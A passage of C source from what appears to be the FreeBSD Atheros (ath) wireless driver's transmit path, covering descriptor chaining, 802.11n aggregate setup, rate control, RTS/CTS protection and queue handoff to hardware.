!= bf->bf_nseg - 1) && (bp < numTxMaps)) continue; /* * Last segment or we're out of buffer pointers. */ bp = 0; if (i == bf->bf_nseg - 1) ath_hal_settxdesclink(ah, (struct ath_desc *) ds, 0); else ath_hal_settxdesclink(ah, (struct ath_desc *) ds, bf->bf_daddr + dd->dd_descsize * (dsp + 1)); /* * XXX This assumes that bfs_txq is the actual destination * hardware queue at this point. It may not have been * assigned, it may actually be pointing to the multicast * software TXQ id. These must be fixed! */ ath_hal_filltxdesc(ah, (struct ath_desc *) ds , bufAddrList , segLenList , bf->bf_descid /* XXX desc id */ , bf->bf_state.bfs_tx_queue , isFirstDesc /* first segment */ , i == bf->bf_nseg - 1 /* last segment */ , (struct ath_desc *) ds0 /* first descriptor */ ); /* * Make sure the 11n aggregate fields are cleared. * * XXX TODO: this doesn't need to be called for * aggregate frames; as it'll be called on all * sub-frames. Since the descriptors are in * non-cacheable memory, this leads to some * rather slow writes on MIPS/ARM platforms. */ if (ath_tx_is_11n(sc)) ath_hal_clr11n_aggr(sc->sc_ah, (struct ath_desc *) ds); /* * If 11n is enabled, set it up as if it's an aggregate * frame. */ if (is_last_subframe) { ath_hal_set11n_aggr_last(sc->sc_ah, (struct ath_desc *) ds); } else if (is_aggr) { /* * This clears the aggrlen field; so * the caller needs to call set_aggr_first()! * * XXX TODO: don't call this for the first * descriptor in the first frame in an * aggregate! */ ath_hal_set11n_aggr_middle(sc->sc_ah, (struct ath_desc *) ds, bf->bf_state.bfs_ndelim); } isFirstDesc = 0; bf->bf_lastds = (struct ath_desc *) ds; /* * Don't forget to skip to the next descriptor. */ ds += sc->sc_tx_desclen; dsp++; /* * .. and don't forget to blank these out! */ bzero(bufAddrList, sizeof(bufAddrList)); bzero(segLenList, sizeof(segLenList)); } bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); } /* * Set the rate control fields in the given descriptor based on * the bf_state fields and node state. * * The bfs fields should already be set with the relevant rate * control information, including whether MRR is to be enabled. * * Since the FreeBSD HAL currently sets up the first TX rate * in ath_hal_setuptxdesc(), this will setup the MRR * conditionally for the pre-11n chips, and call ath_buf_set_rate * unconditionally for 11n chips. 
These require the 11n rate * scenario to be set if MCS rates are enabled, so it's easier * to just always call it. The caller can then only set rates 2, 3 * and 4 if multi-rate retry is needed. */ static void ath_tx_set_ratectrl(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf) { struct ath_rc_series *rc = bf->bf_state.bfs_rc; /* If mrr is disabled, blank tries 1, 2, 3 */ if (! bf->bf_state.bfs_ismrr) rc[1].tries = rc[2].tries = rc[3].tries = 0; #if 0 /* * If NOACK is set, just set ntries=1. */ else if (bf->bf_state.bfs_txflags & HAL_TXDESC_NOACK) { rc[1].tries = rc[2].tries = rc[3].tries = 0; rc[0].tries = 1; } #endif /* * Always call - that way a retried descriptor will * have the MRR fields overwritten. * * XXX TODO: see if this is really needed - setting up * the first descriptor should set the MRR fields to 0 * for us anyway. */ if (ath_tx_is_11n(sc)) { ath_buf_set_rate(sc, ni, bf); } else { ath_hal_setupxtxdesc(sc->sc_ah, bf->bf_desc , rc[1].ratecode, rc[1].tries , rc[2].ratecode, rc[2].tries , rc[3].ratecode, rc[3].tries ); } } /* * Setup segments+descriptors for an 11n aggregate. * bf_first is the first buffer in the aggregate. * The descriptor list must already been linked together using * bf->bf_next. */ static void ath_tx_setds_11n(struct ath_softc *sc, struct ath_buf *bf_first) { struct ath_buf *bf, *bf_prev = NULL; struct ath_desc *ds0 = bf_first->bf_desc; DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: nframes=%d, al=%d\n", __func__, bf_first->bf_state.bfs_nframes, bf_first->bf_state.bfs_al); bf = bf_first; if (bf->bf_state.bfs_txrate0 == 0) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: bf=%p, txrate0=%d\n", __func__, bf, 0); if (bf->bf_state.bfs_rc[0].ratecode == 0) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: bf=%p, rix0=%d\n", __func__, bf, 0); /* * Setup all descriptors of all subframes - this will * call ath_hal_set11naggrmiddle() on every frame. */ while (bf != NULL) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: bf=%p, nseg=%d, pktlen=%d, seqno=%d\n", __func__, bf, bf->bf_nseg, bf->bf_state.bfs_pktlen, SEQNO(bf->bf_state.bfs_seqno)); /* * Setup the initial fields for the first descriptor - all * the non-11n specific stuff. */ ath_hal_setuptxdesc(sc->sc_ah, bf->bf_desc , bf->bf_state.bfs_pktlen /* packet length */ , bf->bf_state.bfs_hdrlen /* header length */ , bf->bf_state.bfs_atype /* Atheros packet type */ , bf->bf_state.bfs_txpower /* txpower */ , bf->bf_state.bfs_txrate0 , bf->bf_state.bfs_try0 /* series 0 rate/tries */ , bf->bf_state.bfs_keyix /* key cache index */ , bf->bf_state.bfs_txantenna /* antenna mode */ , bf->bf_state.bfs_txflags | HAL_TXDESC_INTREQ /* flags */ , bf->bf_state.bfs_ctsrate /* rts/cts rate */ , bf->bf_state.bfs_ctsduration /* rts/cts duration */ ); /* * First descriptor? Setup the rate control and initial * aggregate header information. */ if (bf == bf_first) { /* * setup first desc with rate and aggr info */ ath_tx_set_ratectrl(sc, bf->bf_node, bf); } /* * Setup the descriptors for a multi-descriptor frame. * This is both aggregate and non-aggregate aware. */ ath_tx_chaindesclist(sc, ds0, bf, 1, /* is_aggr */ !! (bf == bf_first), /* is_first_subframe */ !! (bf->bf_next == NULL) /* is_last_subframe */ ); if (bf == bf_first) { /* * Initialise the first 11n aggregate with the * aggregate length and aggregate enable bits. */ ath_hal_set11n_aggr_first(sc->sc_ah, ds0, bf->bf_state.bfs_al, bf->bf_state.bfs_ndelim); } /* * Link the last descriptor of the previous frame * to the beginning descriptor of this frame. 
*/ if (bf_prev != NULL) ath_hal_settxdesclink(sc->sc_ah, bf_prev->bf_lastds, bf->bf_daddr); /* Save a copy so we can link the next descriptor in */ bf_prev = bf; bf = bf->bf_next; } /* * Set the first descriptor bf_lastds field to point to * the last descriptor in the last subframe, that's where * the status update will occur. */ bf_first->bf_lastds = bf_prev->bf_lastds; /* * And bf_last in the first descriptor points to the end of * the aggregate list. */ bf_first->bf_last = bf_prev; /* * For non-AR9300 NICs, which require the rate control * in the final descriptor - let's set that up now. * * This is because the filltxdesc() HAL call doesn't * populate the last segment with rate control information * if firstSeg is also true. For non-aggregate frames * that is fine, as the first frame already has rate control * info. But if the last frame in an aggregate has one * descriptor, both firstseg and lastseg will be true and * the rate info isn't copied. * * This is inefficient on MIPS/ARM platforms that have * non-cachable memory for TX descriptors, but we'll just * make do for now. * * As to why the rate table is stashed in the last descriptor * rather than the first descriptor? Because proctxdesc() * is called on the final descriptor in an MPDU or A-MPDU - * ie, the one that gets updated by the hardware upon * completion. That way proctxdesc() doesn't need to know * about the first _and_ last TX descriptor. */ ath_hal_setuplasttxdesc(sc->sc_ah, bf_prev->bf_lastds, ds0); DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: end\n", __func__); } /* * Hand-off a frame to the multicast TX queue. * * This is a software TXQ which will be appended to the CAB queue * during the beacon setup code. * * XXX TODO: since the AR9300 EDMA TX queue support wants the QCU ID * as part of the TX descriptor, bf_state.bfs_tx_queue must be updated * with the actual hardware txq, or all of this will fall apart. * * XXX It may not be a bad idea to just stuff the QCU ID into bf_state * and retire bfs_tx_queue; then make sure the CABQ QCU ID is populated * correctly. */ static void ath_tx_handoff_mcast(struct ath_softc *sc, struct ath_txq *txq, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); KASSERT((bf->bf_flags & ATH_BUF_BUSY) == 0, ("%s: busy status 0x%x", __func__, bf->bf_flags)); /* * Ensure that the tx queue is the cabq, so things get * mapped correctly. */ if (bf->bf_state.bfs_tx_queue != sc->sc_cabq->axq_qnum) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: bf=%p, bfs_tx_queue=%d, axq_qnum=%d\n", __func__, bf, bf->bf_state.bfs_tx_queue, txq->axq_qnum); } ATH_TXQ_LOCK(txq); if (ATH_TXQ_LAST(txq, axq_q_s) != NULL) { struct ath_buf *bf_last = ATH_TXQ_LAST(txq, axq_q_s); struct ieee80211_frame *wh; /* mark previous frame */ wh = mtod(bf_last->bf_m, struct ieee80211_frame *); wh->i_fc[1] |= IEEE80211_FC1_MORE_DATA; bus_dmamap_sync(sc->sc_dmat, bf_last->bf_dmamap, BUS_DMASYNC_PREWRITE); /* link descriptor */ ath_hal_settxdesclink(sc->sc_ah, bf_last->bf_lastds, bf->bf_daddr); } ATH_TXQ_INSERT_TAIL(txq, bf, bf_list); ATH_TXQ_UNLOCK(txq); } /* * Hand-off packet to a hardware queue. */ static void ath_tx_handoff_hw(struct ath_softc *sc, struct ath_txq *txq, struct ath_buf *bf) { struct ath_hal *ah = sc->sc_ah; struct ath_buf *bf_first; /* * Insert the frame on the outbound list and pass it on * to the hardware. Multicast frames buffered for power * save stations and transmit from the CAB queue are stored * on a s/w only queue and loaded on to the CAB queue in * the SWBA handler since frames only go out on DTIM and * to avoid possible races. 
*/ ATH_TX_LOCK_ASSERT(sc); KASSERT((bf->bf_flags & ATH_BUF_BUSY) == 0, ("%s: busy status 0x%x", __func__, bf->bf_flags)); KASSERT(txq->axq_qnum != ATH_TXQ_SWQ, ("ath_tx_handoff_hw called for mcast queue")); /* * XXX racy, should hold the PCU lock when checking this, * and also should ensure that the TX counter is >0! */ KASSERT((sc->sc_inreset_cnt == 0), ("%s: TX during reset?\n", __func__)); #if 0 /* * This causes a LOR. Find out where the PCU lock is being * held whilst the TXQ lock is grabbed - that shouldn't * be occuring. */ ATH_PCU_LOCK(sc); if (sc->sc_inreset_cnt) { ATH_PCU_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_RESET, "%s: called with sc_in_reset != 0\n", __func__); DPRINTF(sc, ATH_DEBUG_XMIT, "%s: queued: TXDP[%u] = %p (%p) depth %d\n", __func__, txq->axq_qnum, (caddr_t)bf->bf_daddr, bf->bf_desc, txq->axq_depth); /* XXX axq_link needs to be set and updated! */ ATH_TXQ_INSERT_TAIL(txq, bf, bf_list); if (bf->bf_state.bfs_aggr) txq->axq_aggr_depth++; return; } ATH_PCU_UNLOCK(sc); #endif ATH_TXQ_LOCK(txq); /* * XXX TODO: if there's a holdingbf, then * ATH_TXQ_PUTRUNNING should be clear. * * If there is a holdingbf and the list is empty, * then axq_link should be pointing to the holdingbf. * * Otherwise it should point to the last descriptor * in the last ath_buf. * * In any case, we should really ensure that we * update the previous descriptor link pointer to * this descriptor, regardless of all of the above state. * * For now this is captured by having axq_link point * to either the holdingbf (if the TXQ list is empty) * or the end of the list (if the TXQ list isn't empty.) * I'd rather just kill axq_link here and do it as above. */ /* * Append the frame to the TX queue. */ ATH_TXQ_INSERT_TAIL(txq, bf, bf_list); ATH_KTR(sc, ATH_KTR_TX, 3, "ath_tx_handoff: non-tdma: txq=%u, add bf=%p " "depth=%d", txq->axq_qnum, bf, txq->axq_depth); /* * If there's a link pointer, update it. * * XXX we should replace this with the above logic, just * to kill axq_link with fire. */ if (txq->axq_link != NULL) { *txq->axq_link = bf->bf_daddr; DPRINTF(sc, ATH_DEBUG_XMIT, "%s: link[%u](%p)=%p (%p) depth %d\n", __func__, txq->axq_qnum, txq->axq_link, (caddr_t)bf->bf_daddr, bf->bf_desc, txq->axq_depth); ATH_KTR(sc, ATH_KTR_TX, 5, "ath_tx_handoff: non-tdma: link[%u](%p)=%p (%p) " "lastds=%d", txq->axq_qnum, txq->axq_link, (caddr_t)bf->bf_daddr, bf->bf_desc, bf->bf_lastds); } /* * If we've not pushed anything into the hardware yet, * push the head of the queue into the TxDP. * * Once we've started DMA, there's no guarantee that * updating the TxDP with a new value will actually work. * So we just don't do that - if we hit the end of the list, * we keep that buffer around (the "holding buffer") and * re-start DMA by updating the link pointer of _that_ * descriptor and then restart DMA. */ if (! (txq->axq_flags & ATH_TXQ_PUTRUNNING)) { bf_first = TAILQ_FIRST(&txq->axq_q); txq->axq_flags |= ATH_TXQ_PUTRUNNING; ath_hal_puttxbuf(ah, txq->axq_qnum, bf_first->bf_daddr); DPRINTF(sc, ATH_DEBUG_XMIT, "%s: TXDP[%u] = %p (%p) depth %d\n", __func__, txq->axq_qnum, (caddr_t)bf_first->bf_daddr, bf_first->bf_desc, txq->axq_depth); ATH_KTR(sc, ATH_KTR_TX, 5, "ath_tx_handoff: TXDP[%u] = %p (%p) " "lastds=%p depth %d", txq->axq_qnum, (caddr_t)bf_first->bf_daddr, bf_first->bf_desc, bf_first->bf_lastds, txq->axq_depth); } /* * Ensure that the bf TXQ matches this TXQ, so later * checking and holding buffer manipulation is sane. 
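The hand-off policy described in the comments above (program TxDP only for the first push while DMA is idle, otherwise append by patching the previous tail's link pointer and kicking TxE) can be modeled with a few lines of state. Everything below is a simplified stand-in, not the HAL API.

```c
/*
 * Toy model of the ath_tx_handoff_hw() policy above: the first buffer
 * pushed while DMA is idle goes into the queue's TxDP; later buffers
 * are appended by patching the previous tail's link word.  The
 * "hardware" here is just a pair of recorded values.
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

struct ex_txq {
	bool		put_running;	/* has TxDP been written yet? */
	uint32_t	txdp;		/* last address written to TxDP */
	uint32_t	*link;		/* where the next daddr is patched in */
};

struct ex_buf {
	uint32_t	daddr;		/* descriptor DMA address */
	uint32_t	link_word;	/* link field of its last descriptor */
};

static void
ex_handoff(struct ex_txq *txq, struct ex_buf *bf)
{
	if (txq->link != NULL)
		*txq->link = bf->daddr;		/* chain after previous tail */
	if (!txq->put_running) {
		txq->txdp = bf->daddr;		/* first push: program TxDP */
		txq->put_running = true;
	}
	txq->link = &bf->link_word;		/* future frames chain here */
	/* An ath_hal_txstart() equivalent would be kicked here. */
}

int
main(void)
{
	struct ex_txq q = { 0 };
	struct ex_buf a = { .daddr = 0x1000 }, b = { .daddr = 0x2000 };

	ex_handoff(&q, &a);
	ex_handoff(&q, &b);
	printf("TxDP=0x%x, a.link=0x%x\n", (unsigned)q.txdp,
	    (unsigned)a.link_word);
	return (0);
}
```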
*/ if (bf->bf_state.bfs_tx_queue != txq->axq_qnum) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: bf=%p, bfs_tx_queue=%d, axq_qnum=%d\n", __func__, bf, bf->bf_state.bfs_tx_queue, txq->axq_qnum); } /* * Track aggregate queue depth. */ if (bf->bf_state.bfs_aggr) txq->axq_aggr_depth++; /* * Update the link pointer. */ ath_hal_gettxdesclinkptr(ah, bf->bf_lastds, &txq->axq_link); /* * Start DMA. * * If we wrote a TxDP above, DMA will start from here. * * If DMA is running, it'll do nothing. * * If the DMA engine hit the end of the QCU list (ie LINK=NULL, * or VEOL) then it stops at the last transmitted write. * We then append a new frame by updating the link pointer * in that descriptor and then kick TxE here; it will re-read * that last descriptor and find the new descriptor to transmit. * * This is why we keep the holding descriptor around. */ ath_hal_txstart(ah, txq->axq_qnum); ATH_TXQ_UNLOCK(txq); ATH_KTR(sc, ATH_KTR_TX, 1, "ath_tx_handoff: txq=%u, txstart", txq->axq_qnum); } /* * Restart TX DMA for the given TXQ. * * This must be called whether the queue is empty or not. */ static void ath_legacy_tx_dma_restart(struct ath_softc *sc, struct ath_txq *txq) { struct ath_buf *bf, *bf_last; ATH_TXQ_LOCK_ASSERT(txq); /* XXX make this ATH_TXQ_FIRST */ bf = TAILQ_FIRST(&txq->axq_q); bf_last = ATH_TXQ_LAST(txq, axq_q_s); if (bf == NULL) return; DPRINTF(sc, ATH_DEBUG_RESET, "%s: Q%d: bf=%p, bf_last=%p, daddr=0x%08x\n", __func__, txq->axq_qnum, bf, bf_last, (uint32_t) bf->bf_daddr); #ifdef ATH_DEBUG if (sc->sc_debug & ATH_DEBUG_RESET) ath_tx_dump(sc, txq); #endif /* * This is called from a restart, so DMA is known to be * completely stopped. */ KASSERT((!(txq->axq_flags & ATH_TXQ_PUTRUNNING)), ("%s: Q%d: called with PUTRUNNING=1\n", __func__, txq->axq_qnum)); ath_hal_puttxbuf(sc->sc_ah, txq->axq_qnum, bf->bf_daddr); txq->axq_flags |= ATH_TXQ_PUTRUNNING; ath_hal_gettxdesclinkptr(sc->sc_ah, bf_last->bf_lastds, &txq->axq_link); ath_hal_txstart(sc->sc_ah, txq->axq_qnum); } /* * Hand off a packet to the hardware (or mcast queue.) * * The relevant hardware txq should be locked. */ static void ath_legacy_xmit_handoff(struct ath_softc *sc, struct ath_txq *txq, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); #ifdef ATH_DEBUG_ALQ if (if_ath_alq_checkdebug(&sc->sc_alq, ATH_ALQ_EDMA_TXDESC)) ath_tx_alq_post(sc, bf); #endif if (txq->axq_qnum == ATH_TXQ_SWQ) ath_tx_handoff_mcast(sc, txq, bf); else ath_tx_handoff_hw(sc, txq, bf); } static int ath_tx_tag_crypto(struct ath_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, int iswep, int isfrag, int *hdrlen, int *pktlen, int *keyix) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: hdrlen=%d, pktlen=%d, isfrag=%d, iswep=%d, m0=%p\n", __func__, *hdrlen, *pktlen, isfrag, iswep, m0); if (iswep) { const struct ieee80211_cipher *cip; struct ieee80211_key *k; /* * Construct the 802.11 header+trailer for an encrypted * frame. The only reason this can fail is because of an * unknown or unsupported cipher/key type. */ k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { /* * This can happen when the key is yanked after the * frame was queued. Just discard the frame; the * 802.11 layer counts failures and provides * debugging/diagnostics. */ return (0); } /* * Adjust the packet + header lengths for the crypto * additions and calculate the h/w key index. When * a s/w mic is done the frame will have had any mic * added to it prior to entry so m0->m_pkthdr.len will * account for it. Otherwise we need to add it to the * packet length. 
*/ cip = k->wk_cipher; (*hdrlen) += cip->ic_header; (*pktlen) += cip->ic_header + cip->ic_trailer; /* NB: frags always have any TKIP MIC done in s/w */ if ((k->wk_flags & IEEE80211_KEY_SWMIC) == 0 && !isfrag) (*pktlen) += cip->ic_miclen; (*keyix) = k->wk_keyix; } else if (ni->ni_ucastkey.wk_cipher == &ieee80211_cipher_none) { /* * Use station key cache slot, if assigned. */ (*keyix) = ni->ni_ucastkey.wk_keyix; if ((*keyix) == IEEE80211_KEYIX_NONE) (*keyix) = HAL_TXKEYIX_INVALID; } else (*keyix) = HAL_TXKEYIX_INVALID; return (1); } /* * Calculate whether interoperability protection is required for * this frame. * * This requires the rate control information be filled in, * as the protection requirement depends upon the current * operating mode / PHY. */ static void ath_tx_calc_protection(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_frame *wh; uint8_t rix; uint16_t flags; int shortPreamble; const HAL_RATE_TABLE *rt = sc->sc_currates; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; flags = bf->bf_state.bfs_txflags; rix = bf->bf_state.bfs_rc[0].rix; shortPreamble = bf->bf_state.bfs_shpream; wh = mtod(bf->bf_m, struct ieee80211_frame *); /* * If 802.11g protection is enabled, determine whether * to use RTS/CTS or just CTS. Note that this is only * done for OFDM unicast frames. */ if ((ic->ic_flags & IEEE80211_F_USEPROT) && rt->info[rix].phy == IEEE80211_T_OFDM && (flags & HAL_TXDESC_NOACK) == 0) { bf->bf_state.bfs_doprot = 1; /* XXX fragments must use CCK rates w/ protection */ if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) { flags |= HAL_TXDESC_RTSENA; } else if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) { flags |= HAL_TXDESC_CTSENA; } /* * For frags it would be desirable to use the * highest CCK rate for RTS/CTS. But stations * farther away may detect it at a lower CCK rate * so use the configured protection rate instead * (for now). */ sc->sc_stats.ast_tx_protect++; } /* * If 11n protection is enabled and it's a HT frame, * enable RTS. * * XXX ic_htprotmode or ic_curhtprotmode? * XXX should it_htprotmode only matter if ic_curhtprotmode * XXX indicates it's not a HT pure environment? */ if ((ic->ic_htprotmode == IEEE80211_PROT_RTSCTS) && rt->info[rix].phy == IEEE80211_T_HT && (flags & HAL_TXDESC_NOACK) == 0) { flags |= HAL_TXDESC_RTSENA; sc->sc_stats.ast_tx_htprotect++; } bf->bf_state.bfs_txflags = flags; } /* * Update the frame duration given the currently selected rate. * * This also updates the frame duration value, so it will require * a DMA flush. */ static void ath_tx_calc_duration(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_frame *wh; uint8_t rix; uint16_t flags; int shortPreamble; struct ath_hal *ah = sc->sc_ah; const HAL_RATE_TABLE *rt = sc->sc_currates; int isfrag = bf->bf_m->m_flags & M_FRAG; flags = bf->bf_state.bfs_txflags; rix = bf->bf_state.bfs_rc[0].rix; shortPreamble = bf->bf_state.bfs_shpream; wh = mtod(bf->bf_m, struct ieee80211_frame *); /* * Calculate duration. This logically belongs in the 802.11 * layer but it lacks sufficient information to calculate it. */ if ((flags & HAL_TXDESC_NOACK) == 0 && (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_CTL) { u_int16_t dur; if (shortPreamble) dur = rt->info[rix].spAckDuration; else dur = rt->info[rix].lpAckDuration; if (wh->i_fc[1] & IEEE80211_FC1_MORE_FRAG) { dur += dur; /* additional SIFS+ACK */ /* * Include the size of next fragment so NAV is * updated properly. 
The last fragment uses only * the ACK duration * * XXX TODO: ensure that the rate lookup for each * fragment is the same as the rate used by the * first fragment! */ dur += ath_hal_computetxtime(ah, rt, bf->bf_nextfraglen, rix, shortPreamble); } if (isfrag) { /* * Force hardware to use computed duration for next * fragment by disabling multi-rate retry which updates * duration based on the multi-rate duration table. */ bf->bf_state.bfs_ismrr = 0; bf->bf_state.bfs_try0 = ATH_TXMGTTRY; /* XXX update bfs_rc[0].try? */ } /* Update the duration field itself */ *(u_int16_t *)wh->i_dur = htole16(dur); } } static uint8_t ath_tx_get_rtscts_rate(struct ath_hal *ah, const HAL_RATE_TABLE *rt, int cix, int shortPreamble) { uint8_t ctsrate; /* * CTS transmit rate is derived from the transmit rate * by looking in the h/w rate table. We must also factor * in whether or not a short preamble is to be used. */ /* NB: cix is set above where RTS/CTS is enabled */ KASSERT(cix != 0xff, ("cix not setup")); ctsrate = rt->info[cix].rateCode; /* XXX this should only matter for legacy rates */ if (shortPreamble) ctsrate |= rt->info[cix].shortPreamble; return (ctsrate); } /* * Calculate the RTS/CTS duration for legacy frames. */ static int ath_tx_calc_ctsduration(struct ath_hal *ah, int rix, int cix, int shortPreamble, int pktlen, const HAL_RATE_TABLE *rt, int flags) { int ctsduration = 0; /* This mustn't be called for HT modes */ if (rt->info[cix].phy == IEEE80211_T_HT) { printf("%s: HT rate where it shouldn't be (0x%x)\n", __func__, rt->info[cix].rateCode); return (-1); } /* * Compute the transmit duration based on the frame * size and the size of an ACK frame. We call into the * HAL to do the computation since it depends on the * characteristics of the actual PHY being used. * * NB: CTS is assumed the same size as an ACK so we can * use the precalculated ACK durations. */ if (shortPreamble) { if (flags & HAL_TXDESC_RTSENA) /* SIFS + CTS */ ctsduration += rt->info[cix].spAckDuration; ctsduration += ath_hal_computetxtime(ah, rt, pktlen, rix, AH_TRUE); if ((flags & HAL_TXDESC_NOACK) == 0) /* SIFS + ACK */ ctsduration += rt->info[rix].spAckDuration; } else { if (flags & HAL_TXDESC_RTSENA) /* SIFS + CTS */ ctsduration += rt->info[cix].lpAckDuration; ctsduration += ath_hal_computetxtime(ah, rt, pktlen, rix, AH_FALSE); if ((flags & HAL_TXDESC_NOACK) == 0) /* SIFS + ACK */ ctsduration += rt->info[rix].lpAckDuration; } return (ctsduration); } /* * Update the given ath_buf with updated rts/cts setup and duration * values. * * To support rate lookups for each software retry, the rts/cts rate * and cts duration must be re-calculated. * * This function assumes the RTS/CTS flags have been set as needed; * mrr has been disabled; and the rate control lookup has been done. * * XXX TODO: MRR need only be disabled for the pre-11n NICs. * XXX The 11n NICs support per-rate RTS/CTS configuration. */ static void ath_tx_set_rtscts(struct ath_softc *sc, struct ath_buf *bf) { uint16_t ctsduration = 0; uint8_t ctsrate = 0; uint8_t rix = bf->bf_state.bfs_rc[0].rix; uint8_t cix = 0; const HAL_RATE_TABLE *rt = sc->sc_currates; /* * No RTS/CTS enabled? Don't bother. */ if ((bf->bf_state.bfs_txflags & (HAL_TXDESC_RTSENA | HAL_TXDESC_CTSENA)) == 0) { /* XXX is this really needed? */ bf->bf_state.bfs_ctsrate = 0; bf->bf_state.bfs_ctsduration = 0; return; } /* * If protection is enabled, use the protection rix control * rate. Otherwise use the rate0 control rate. 
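The legacy CTS duration arithmetic in ath_tx_calc_ctsduration() above reduces to three optional terms: SIFS+CTS when RTS is used, the frame's own transmit time, and SIFS+ACK unless the frame is NOACK. The sketch below mirrors that sum; ex_txtime() is a crude stand-in for ath_hal_computetxtime() and ignores preamble details.

```c
/*
 * Sketch of the legacy RTS/CTS duration sum performed above.  CTS is
 * assumed ACK-sized, so a precomputed ACK duration is reused for it.
 */
#include <stdbool.h>

struct ex_ratedur {
	int	ack_dur;	/* SIFS + ACK at this rate, microseconds */
};

/* Stand-in for ath_hal_computetxtime(): airtime of 'pktlen' bytes. */
static int
ex_txtime(int pktlen, int rate_kbps)
{
	return ((pktlen * 8 * 1000) / rate_kbps);	/* crude, no preamble */
}

int
ex_ctsduration(bool use_rts, bool want_ack, int pktlen,
    const struct ex_ratedur *ctl_rate, const struct ex_ratedur *data_rate,
    int data_rate_kbps)
{
	int dur = 0;

	if (use_rts)
		dur += ctl_rate->ack_dur;	/* SIFS + CTS */
	dur += ex_txtime(pktlen, data_rate_kbps);
	if (want_ack)
		dur += data_rate->ack_dur;	/* SIFS + ACK */
	return (dur);
}
```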
*/ if (bf->bf_state.bfs_doprot) rix = sc->sc_protrix; else rix = bf->bf_state.bfs_rc[0].rix; /* * If the raw path has hard-coded ctsrate0 to something, * use it. */ if (bf->bf_state.bfs_ctsrate0 != 0) cix = ath_tx_findrix(sc, bf->bf_state.bfs_ctsrate0); else /* Control rate from above */ cix = rt->info[rix].controlRate; /* Calculate the rtscts rate for the given cix */ ctsrate = ath_tx_get_rtscts_rate(sc->sc_ah, rt, cix, bf->bf_state.bfs_shpream); /* The 11n chipsets do ctsduration calculations for you */ if (! ath_tx_is_11n(sc)) ctsduration = ath_tx_calc_ctsduration(sc->sc_ah, rix, cix, bf->bf_state.bfs_shpream, bf->bf_state.bfs_pktlen, rt, bf->bf_state.bfs_txflags); /* Squirrel away in ath_buf */ bf->bf_state.bfs_ctsrate = ctsrate; bf->bf_state.bfs_ctsduration = ctsduration; /* * Must disable multi-rate retry when using RTS/CTS. */ if (!sc->sc_mrrprot) { bf->bf_state.bfs_ismrr = 0; bf->bf_state.bfs_try0 = bf->bf_state.bfs_rc[0].tries = ATH_TXMGTTRY; /* XXX ew */ } } /* * Setup the descriptor chain for a normal or fast-frame * frame. * * XXX TODO: extend to include the destination hardware QCU ID. * Make sure that is correct. Make sure that when being added * to the mcastq, the CABQ QCUID is set or things will get a bit * odd. */ static void ath_tx_setds(struct ath_softc *sc, struct ath_buf *bf) { struct ath_desc *ds = bf->bf_desc; struct ath_hal *ah = sc->sc_ah; if (bf->bf_state.bfs_txrate0 == 0) DPRINTF(sc, ATH_DEBUG_XMIT, "%s: bf=%p, txrate0=%d\n", __func__, bf, 0); ath_hal_setuptxdesc(ah, ds , bf->bf_state.bfs_pktlen /* packet length */ , bf->bf_state.bfs_hdrlen /* header length */ , bf->bf_state.bfs_atype /* Atheros packet type */ , bf->bf_state.bfs_txpower /* txpower */ , bf->bf_state.bfs_txrate0 , bf->bf_state.bfs_try0 /* series 0 rate/tries */ , bf->bf_state.bfs_keyix /* key cache index */ , bf->bf_state.bfs_txantenna /* antenna mode */ , bf->bf_state.bfs_txflags /* flags */ , bf->bf_state.bfs_ctsrate /* rts/cts rate */ , bf->bf_state.bfs_ctsduration /* rts/cts duration */ ); /* * This will be overriden when the descriptor chain is written. */ bf->bf_lastds = ds; bf->bf_last = bf; /* Set rate control and descriptor chain for this frame */ ath_tx_set_ratectrl(sc, bf->bf_node, bf); ath_tx_chaindesclist(sc, ds, bf, 0, 0, 0); } /* * Do a rate lookup. * * This performs a rate lookup for the given ath_buf only if it's required. * Non-data frames and raw frames don't require it. * * This populates the primary and MRR entries; MRR values are * then disabled later on if something requires it (eg RTS/CTS on * pre-11n chipsets. * * This needs to be done before the RTS/CTS fields are calculated * as they may depend upon the rate chosen. */ static void ath_tx_do_ratelookup(struct ath_softc *sc, struct ath_buf *bf) { uint8_t rate, rix; int try0; if (! 
bf->bf_state.bfs_doratelookup) return; /* Get rid of any previous state */ bzero(bf->bf_state.bfs_rc, sizeof(bf->bf_state.bfs_rc)); ATH_NODE_LOCK(ATH_NODE(bf->bf_node)); ath_rate_findrate(sc, ATH_NODE(bf->bf_node), bf->bf_state.bfs_shpream, bf->bf_state.bfs_pktlen, &rix, &try0, &rate); /* In case MRR is disabled, make sure rc[0] is setup correctly */ bf->bf_state.bfs_rc[0].rix = rix; bf->bf_state.bfs_rc[0].ratecode = rate; bf->bf_state.bfs_rc[0].tries = try0; if (bf->bf_state.bfs_ismrr && try0 != ATH_TXMAXTRY) ath_rate_getxtxrates(sc, ATH_NODE(bf->bf_node), rix, bf->bf_state.bfs_rc); ATH_NODE_UNLOCK(ATH_NODE(bf->bf_node)); sc->sc_txrix = rix; /* for LED blinking */ sc->sc_lastdatarix = rix; /* for fast frames */ bf->bf_state.bfs_try0 = try0; bf->bf_state.bfs_txrate0 = rate; } /* * Update the CLRDMASK bit in the ath_buf if it needs to be set. */ static void ath_tx_update_clrdmask(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { 